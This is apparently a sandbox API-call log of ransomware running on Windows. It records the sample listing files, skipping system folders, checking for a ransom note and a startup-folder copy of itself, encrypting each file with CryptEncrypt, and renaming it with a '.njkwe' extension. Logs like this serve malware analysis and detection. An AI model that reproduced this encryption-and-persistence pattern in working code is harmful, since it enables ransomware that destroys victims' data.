(lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\532__connections_cellular_orange (armenia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\532__connections_cellular_orange (armenia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.834] GetProcessHeap () returned 0xbe0000 [0081.834] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.834] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912f8e1e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912f8e1e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912f8e1e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x363, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml", cAlternateFileName="533__C~1.PRO")) returned 1 [0081.834] lstrcmpiW (lpString1="533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.834] lstrcmpiW (lpString1="533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.834] lstrcmpiW (lpString1="533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.834] lstrcmpiW (lpString1="533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.834] lstrcmpiW (lpString1="533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.834] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml") returned 170 [0081.834] StrStrIW (lpFirst="533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.834] lstrcmpW (lpString1="533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.834] lstrcmpW (lpString1="533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.834] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\533__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.834] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\533__connections_cellular_orange la réunion (france)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.835] GetTickCount () returned 0x1154c48 [0081.835] GetTickCount () returned 0x1154c48 [0081.835] GetTickCount () returned 0x1154c48 [0081.835] GetTickCount () returned 0x1154c48 [0081.835] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.835] GetProcessHeap () returned 0xbe0000 [0081.835] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.835] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x363, lpOverlapped=0x0) returned 1 [0081.836] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc9d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.836] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x363, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x363, lpOverlapped=0x0) returned 1 [0081.836] GetProcessHeap () returned 0xbe0000 [0081.836] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.837] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.837] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.837] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.837] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.837] CloseHandle (hObject=0x43c) returned 1 [0081.837] GetProcessHeap () returned 0xbe0000 [0081.837] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.837] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0081.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\533__connections_cellular_orange la réunion (france)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\533__Connections_Cellular_Orange La Réunion (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\533__connections_cellular_orange la réunion (france)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.838] GetProcessHeap () returned 0xbe0000 [0081.838] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.838] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9131f086, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9131f086, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9131f086, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x356, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml", cAlternateFileName="534__C~1.PRO")) returned 1 [0081.838] lstrcmpiW (lpString1="534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.838] lstrcmpiW (lpString1="534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.838] lstrcmpiW (lpString1="534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.838] lstrcmpiW (lpString1="534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.838] lstrcmpiW (lpString1="534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.838] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml") returned 170 [0081.838] StrStrIW (lpFirst="534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.838] lstrcmpW (lpString1="534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.838] lstrcmpW (lpString1="534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.838] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\534__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.838] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\534__connections_cellular_orange la réunion (france)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.839] GetTickCount () returned 0x1154c48 [0081.839] GetTickCount () returned 0x1154c48 [0081.839] GetTickCount () returned 0x1154c48 [0081.839] GetTickCount () returned 0x1154c48 [0081.839] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.839] GetProcessHeap () returned 0xbe0000 [0081.839] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.839] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x356, lpOverlapped=0x0) returned 1 [0081.840] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.841] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x356, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x356, lpOverlapped=0x0) returned 1 [0081.841] GetProcessHeap () returned 0xbe0000 [0081.841] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.841] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.841] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.841] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.841] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.841] CloseHandle (hObject=0x444) returned 1 [0081.841] GetProcessHeap () returned 0xbe0000 [0081.841] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.841] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0081.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\534__connections_cellular_orange la réunion (france)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\534__Connections_Cellular_Orange La Réunion (France)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\534__connections_cellular_orange la réunion (france)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.842] GetProcessHeap () returned 0xbe0000 [0081.842] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.842] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9131f086, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9131f086, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9131f086, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml", cAlternateFileName="535__C~1.PRO")) returned 1 [0081.842] lstrcmpiW (lpString1="535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.842] lstrcmpiW (lpString1="535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.842] lstrcmpiW (lpString1="535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.842] lstrcmpiW (lpString1="535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.842] lstrcmpiW (lpString1="535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.842] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml") returned 160 [0081.842] StrStrIW (lpFirst="535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.842] lstrcmpW (lpString1="535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.842] lstrcmpW (lpString1="535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.842] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\535__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.843] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\535__connections_cellular_orange (moldova)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.843] GetTickCount () returned 0x1154c48 [0081.843] GetTickCount () returned 0x1154c48 [0081.843] GetTickCount () returned 0x1154c48 [0081.843] GetTickCount () returned 0x1154c48 [0081.843] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.843] GetProcessHeap () returned 0xbe0000 [0081.843] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.843] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0081.869] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.869] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0081.869] GetProcessHeap () returned 0xbe0000 [0081.869] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.869] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.869] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.869] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.869] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.869] CloseHandle (hObject=0x444) returned 1 [0081.869] GetProcessHeap () returned 0xbe0000 [0081.869] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.869] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0081.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\535__connections_cellular_orange (moldova)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\535__Connections_Cellular_Orange (Moldova)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\535__connections_cellular_orange (moldova)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.870] GetProcessHeap () returned 0xbe0000 [0081.870] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.870] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9131f086, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9131f086, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9131f086, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x348, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", cAlternateFileName="536__C~1.PRO")) returned 1 [0081.870] lstrcmpiW (lpString1="536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.870] lstrcmpiW (lpString1="536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.870] lstrcmpiW (lpString1="536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.870] lstrcmpiW (lpString1="536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.870] lstrcmpiW (lpString1="536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.870] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml") returned 158 [0081.871] StrStrIW (lpFirst="536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.871] lstrcmpW (lpString1="536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.871] lstrcmpW (lpString1="536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.871] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\536__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.871] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\536__connections_cellular_orange (spain)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.871] GetTickCount () returned 0x1154c67 [0081.871] GetTickCount () returned 0x1154c67 [0081.871] GetTickCount () returned 0x1154c67 [0081.871] GetTickCount () returned 0x1154c67 [0081.871] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.871] GetProcessHeap () returned 0xbe0000 [0081.871] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.871] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x348, lpOverlapped=0x0) returned 1 [0081.873] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcb8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.873] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x348, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x348, lpOverlapped=0x0) returned 1 [0081.873] GetProcessHeap () returned 0xbe0000 [0081.873] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.873] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.873] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 